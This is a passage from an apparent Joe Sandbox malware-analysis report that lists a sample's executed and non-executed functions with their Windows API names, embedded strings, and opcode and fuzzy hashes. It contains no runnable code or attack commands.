                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: File$AttributesDelete
                                                              • String ID:
                                                              • API String ID: 2910425767-0
                                                              • Opcode ID: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
                                                              • Instruction ID: adf2a79140fabccb03c20fd21f07aa3af446659453137af282c5310bbe8ffc9f
                                                              • Opcode Fuzzy Hash: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
                                                              • Instruction Fuzzy Hash: 48E05BB471910195FB6BD7A778153F521419F8D7D1F184121AB42071B0EF3D44C55222
                                                              Function 0000000140012060 Relevance: 3.0, APIs: 2, Instructions: 11memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocHeap$CreateValue
                                                              • String ID:
                                                              • API String ID: 493873155-0
                                                              • Opcode ID: 9e0d5e764e4f7f0553988baf76ecb42ee58d508d85325be61ca51fd0dfb33207
                                                              • Instruction ID: 66307e28580f649ba8418ae6b9c958ace7f1b69875393c61862d084d03b91818
                                                              • Opcode Fuzzy Hash: 9e0d5e764e4f7f0553988baf76ecb42ee58d508d85325be61ca51fd0dfb33207
                                                              • Instruction Fuzzy Hash: 9ED0C939A1175092EB46AB72AC5A3E922A0F75C3C1F901819B70907775DF7E81956A00
                                                              Function 00000001400120A0 Relevance: 3.0, APIs: 2, Instructions: 7memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: DestroyFreeHeap
                                                              • String ID:
                                                              • API String ID: 3293292866-0
                                                              • Opcode ID: fbac162b21188d979bef22f7e680530c08c33df644155045fadef908a37ca857
                                                              • Instruction ID: 71a10d3d5b3131d437c50284ad1bfb95f0c128dd24e11de8e9b8b88d768efc2d
                                                              • Opcode Fuzzy Hash: fbac162b21188d979bef22f7e680530c08c33df644155045fadef908a37ca857
                                                              • Instruction Fuzzy Hash: 4CC04C34611400D2E606EB13EC953A42362B79C7C5F801414E70E1B671CE394955E700
                                                              Function 0000000140011D30 Relevance: 2.6, APIs: 2, Instructions: 67memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocFreememset
                                                              • String ID:
                                                              • API String ID: 3063399779-0
                                                              • Opcode ID: edd241adf8553052784530922556135fb4408ba6f5c1699abdea0ec7c528a08c
                                                              • Instruction ID: 5c5c97092251ccb6e51d21bc2c296289ab600fd53c4e4fe069e69402a2a58e68
                                                              • Opcode Fuzzy Hash: edd241adf8553052784530922556135fb4408ba6f5c1699abdea0ec7c528a08c
                                                              • Instruction Fuzzy Hash: F7213B32601B5086EA1ADB53BC41799A6A8FBC8FD0F498025AF584BB66DE38C852C340
                                                              Function 00000001400126D0 Relevance: 2.6, APIs: 2, Instructions: 50memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocHeapValue
                                                              • String ID:
                                                              • API String ID: 2362848668-0
                                                              • Opcode ID: 5469319e057a9dc06414a52f1e9995086a4e4d267debc5f29e971f3f59de7243
                                                              • Instruction ID: d5031950f6f24f379c2142eebe898701a91e7a03f91a2b9bee16bac6c279ab43
                                                              • Opcode Fuzzy Hash: 5469319e057a9dc06414a52f1e9995086a4e4d267debc5f29e971f3f59de7243
                                                              • Instruction Fuzzy Hash: 2D219676609B44C6CB20CF5AE49025AB7A0F7CCBA8F144216EB8D43B78DF79C651CB40
                                                              Function 000000014000DD30 Relevance: 2.5, APIs: 2, Instructions: 33memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CloseFreeHandleHeap
                                                              • String ID:
                                                              • API String ID: 1642312469-0
                                                              • Opcode ID: 9545ea4844ef45e69c2d13a7e6758b9fd96cb3dc2a279fbef2982152c74e1bd8
                                                              • Instruction ID: 5f93da8337f86b39695cad05c5aa1bbbcf0731d39a623fe836b1511b3ba38e21
                                                              • Opcode Fuzzy Hash: 9545ea4844ef45e69c2d13a7e6758b9fd96cb3dc2a279fbef2982152c74e1bd8
                                                              • Instruction Fuzzy Hash: AD01FB71614A4081EA56EBA7F5543E96391ABCDBE0F445216BB2E4B7F6DE38C4808740
                                                              Function 000000014000DDC0 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: 286ead757777a38e56b81a59e831c417c9f8bfd861d199e35aced7c4af5c72c7
                                                              • Instruction ID: 85eb21683fd68773ec3f68e7974a7ba45b0d300be2a951898864618d3eded784
                                                              • Opcode Fuzzy Hash: 286ead757777a38e56b81a59e831c417c9f8bfd861d199e35aced7c4af5c72c7
                                                              • Instruction Fuzzy Hash: D4F030B6624694CBCB10DF39E00166977B0F349B48F200416EF4847764DB36C992CF10
                                                              Function 000000014000C45C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentVariable
                                                              • String ID:
                                                              • API String ID: 1431749950-0
                                                              • Opcode ID: f36f728fb68e9c030c92917883890652b287511953764533778c77d950d1811c
                                                              • Instruction ID: ab6ea35cc4c4ca181117cfceb55a371778b923cb2c6d718499f93cc637994782
                                                              • Opcode Fuzzy Hash: f36f728fb68e9c030c92917883890652b287511953764533778c77d950d1811c
                                                              • Instruction Fuzzy Hash: 3BC08CA0B1370082FC0FD30BAC943E022E16F0D3C1EC04129AA0C0B338EB3D80944700
                                                              Function 0000000140010FFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Free
                                                              • String ID:
                                                              • API String ID: 3978063606-0
                                                              • Opcode ID: b403f4cd7e6b1ea5231d56a542ea7710078fdd6c3183311bb8828c9ff7a2dcca
                                                              • Instruction ID: 3be53cbf4efc602c07d04e61f546686734bccd281855bf9d316eb8d3f4bb89d6
                                                              • Opcode Fuzzy Hash: b403f4cd7e6b1ea5231d56a542ea7710078fdd6c3183311bb8828c9ff7a2dcca
                                                              • Instruction Fuzzy Hash: E3D0E97091558096F66BA747EC857E422A2B7AC3C5F500419E3050B1B28ABE49DDEA15
                                                              Function 000000014000DC88 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory
                                                              • String ID:
                                                              • API String ID: 1611563598-0
                                                              • Opcode ID: 93ac6205523c289b50a33b5b006d9a2b969cc6c5ca2cd3404325313acfcde68d
                                                              • Instruction ID: d26b75307fbf4d2f65b3bf59e092d1c76b80437de534da0d48005b48f8adbafa
                                                              • Opcode Fuzzy Hash: 93ac6205523c289b50a33b5b006d9a2b969cc6c5ca2cd3404325313acfcde68d
                                                              • Instruction Fuzzy Hash: 74C09B74663002C1FA6A936328A97E451905B0C391F504511F7064117089BD14975530
                                                              Function 000000014000C980 Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CreateHeap
                                                              • String ID:
                                                              • API String ID: 10892065-0
                                                              • Opcode ID: 3010fbf55b21657f3d2da30d78e3fc06337a299998e6cc7e6108e39cc3db3a27
                                                              • Instruction ID: 2c080862c33f0b7fb519294060e944d109da0d65108c87cfa11e07f441f421b0
                                                              • Opcode Fuzzy Hash: 3010fbf55b21657f3d2da30d78e3fc06337a299998e6cc7e6108e39cc3db3a27
                                                              • Instruction Fuzzy Hash: 40C02B34712690C2E3492323AC033991090F34C3C0FD02018F60102770CE3D80A70B00
                                                              Function 000000014000C6B0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: ExceptionHandlerRemoveVectored
                                                              • String ID:
                                                              • API String ID: 1340492425-0
                                                              • Opcode ID: d65e708e3fd015015f13c97e564679718939e1a537f1569a86aba6eef632a387
                                                              • Instruction ID: 43e8ab96d0ef540813763e0684213002212cef3b8ee59004a75f8fb70944dace
                                                              • Opcode Fuzzy Hash: d65e708e3fd015015f13c97e564679718939e1a537f1569a86aba6eef632a387
                                                              • Instruction Fuzzy Hash: 30C08C78B03B0085FA4AEB03B8883A422606B8C7C1F800008E60E037328E3C04A54780
                                                              Function 0000000140012520 Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID:
                                                              • API String ID: 3702945584-0
                                                              • Opcode ID: c164aa80badfc177248d89438e49745db99a56b8fb9d29675fc464102b6282a0
                                                              • Instruction ID: b586a9c78aaa43fddf3ec091a8dff657c7d1e7c92e3b3169bdbbaf5832d2cb3a
                                                              • Opcode Fuzzy Hash: c164aa80badfc177248d89438e49745db99a56b8fb9d29675fc464102b6282a0
                                                              • Instruction Fuzzy Hash: ACD06C36614B84C3CA249B06E85135973A0F788B88F900215EA8D0B734CF3DC222DB00

                                                              Non-executed Functions

                                                              Function 000000014000B758 Relevance: 72.0, APIs: 35, Strings: 6, Instructions: 272windowmemoryregistryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Window$Message$CreateHeapSend$Freewcslen$Accelerator$LoadMetricsSystemTableTranslate$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundIconLongObjectRegisterStockwcscpy
                                                              • String ID: BUTTON$C$EDIT$P$STATIC$n
                                                              • API String ID: 9748049-1690119102
                                                              • Opcode ID: c01de26334065d18653497f5b45086f7b5809085fdd55da687512dab041c8858
                                                              • Instruction ID: f11a45e4f50ece19de517c67b98e9e797584e7b20c87343cc1d5b6865565d8d0
                                                              • Opcode Fuzzy Hash: c01de26334065d18653497f5b45086f7b5809085fdd55da687512dab041c8858
                                                              • Instruction Fuzzy Hash: 4DD134B5605B4086EB12DF62F8447AA77A5FB8CBC8F444129EB4A47B79DF7DC4098B00
                                                              Function 0000000140013021 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 381COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $header crc mismatch$unknown compression method$unknown header flags set
                                                              • API String ID: 0-4074041902
                                                              • Opcode ID: 63d14d99d44cc3d14528aba0519c32bd687ffcf0a398d873a188d18be175c855
                                                              • Instruction ID: dac418b812a3de41c7c7b5072b67fa498c356b49e4a588b682982c80ed946ec6
                                                              • Opcode Fuzzy Hash: 63d14d99d44cc3d14528aba0519c32bd687ffcf0a398d873a188d18be175c855
                                                              • Instruction Fuzzy Hash: 4DF19C726007508BEB268F1AC48CBAE3BE6F7487C8F064519EF8A4B7A4DB76C555C740
                                                              Function 000000014000BC94 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 115libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskmemsetwcsncpy
                                                              • String ID: P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
                                                              • API String ID: 217932011-4219398408
                                                              • Opcode ID: 39b50941fe3cb3f8533201b67178e799832ef7c6affe56ff9212f5b17596b26d
                                                              • Instruction ID: 4189c401249be1c18680961fdd5f00b64fd9ff4c66db3fab09ee0cba437a9a89
                                                              • Opcode Fuzzy Hash: 39b50941fe3cb3f8533201b67178e799832ef7c6affe56ff9212f5b17596b26d
                                                              • Instruction Fuzzy Hash: 6C418F72211B4086EB16EF12F8447EA73A4F78CBC8F544125EB49477A5DF39C55AC700
                                                              Function 000000014000DB18 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 107libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrarywcscatwcslen$AddressAllocHeapLoadProcTaskValuewcscpy
                                                              • String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
                                                              • API String ID: 1740785346-287042676
                                                              • Opcode ID: 1a17e227a26f4eede426f334c2ee746aae7c8b1e13925a610746eba211cb8f63
                                                              • Instruction ID: 39544a34e48b1591535f5ec23c8084432afafb0fbbbedabb5ee694640fe7ccea
                                                              • Opcode Fuzzy Hash: 1a17e227a26f4eede426f334c2ee746aae7c8b1e13925a610746eba211cb8f63
                                                              • Instruction Fuzzy Hash: A94184B1214A46C2FA26EB57B4A4BF97291AB8C7D0F540127BB0A0B7F5DEB9C841C610
                                                              Function 0000000140016CC4 Relevance: 19.6, APIs: 13, Instructions: 81memoryregistrythreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
                                                              • String ID:
                                                              • API String ID: 298514914-0
                                                              • Opcode ID: 1b9229a9ff34361a6518eb59eadc8af634e0fb6f78aa303e2f888cecdd8f7a24
                                                              • Instruction ID: 65bd0fc00ed65caac6c8ae18375092c396c339aa9c4fc9a556ba9f8eb5a1fbfe
                                                              • Opcode Fuzzy Hash: 1b9229a9ff34361a6518eb59eadc8af634e0fb6f78aa303e2f888cecdd8f7a24
                                                              • Instruction Fuzzy Hash: F141E132205B408AEB129F62EC443E977A0F78CBD5F484129EB490B774DF39C959D740
                                                              Function 0000000140008260 Relevance: 13.7, APIs: 9, Instructions: 249COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: _wcsdupfreewcsncpy$Value
                                                              • String ID:
                                                              • API String ID: 1554701960-0
                                                              • Opcode ID: 1d879e7a0acd0c0829ed1bc558ef67cfa511ed4a967529a3de4af1c33dacc62b
                                                              • Instruction ID: 9aa5ebfb9d0338231e5de8689cc7ecd01d3be8732c0a46cca62a2a5aa1271af7
                                                              • Opcode Fuzzy Hash: 1d879e7a0acd0c0829ed1bc558ef67cfa511ed4a967529a3de4af1c33dacc62b
                                                              • Instruction Fuzzy Hash: FB91BFB2604A8185EA76DF13B9507EA73A0FB48BD5F484225BFCA476E5EB38C542C701
                                                              Function 000000014000B64C Relevance: 12.1, APIs: 8, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Window$ClassDestroyEnableProcUnregister
                                                              • String ID:
                                                              • API String ID: 1570244450-0
                                                              • Opcode ID: 91bde67e80f91e2742b9164cbcf556c590c39b782bd753c692008bc4014d2561
                                                              • Instruction ID: 9942cbda7600913111d3f6e009e2264a98590d225334710fbbc2bdadcd09b10d
                                                              • Opcode Fuzzy Hash: 91bde67e80f91e2742b9164cbcf556c590c39b782bd753c692008bc4014d2561
                                                              • Instruction Fuzzy Hash: F121F9B4204A5182FB56DB27F8483A923A1E78CBC1F549126FB4A4B7B5DF3DC8459700
                                                              Function 000000014000BEA0 Relevance: 12.0, APIs: 8, Instructions: 44threadwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
                                                              • String ID:
                                                              • API String ID: 3383493704-0
                                                              • Opcode ID: 58dc5949c501ee915ee066136f95cf395d457a23a7ff8083782f65faeab631ed
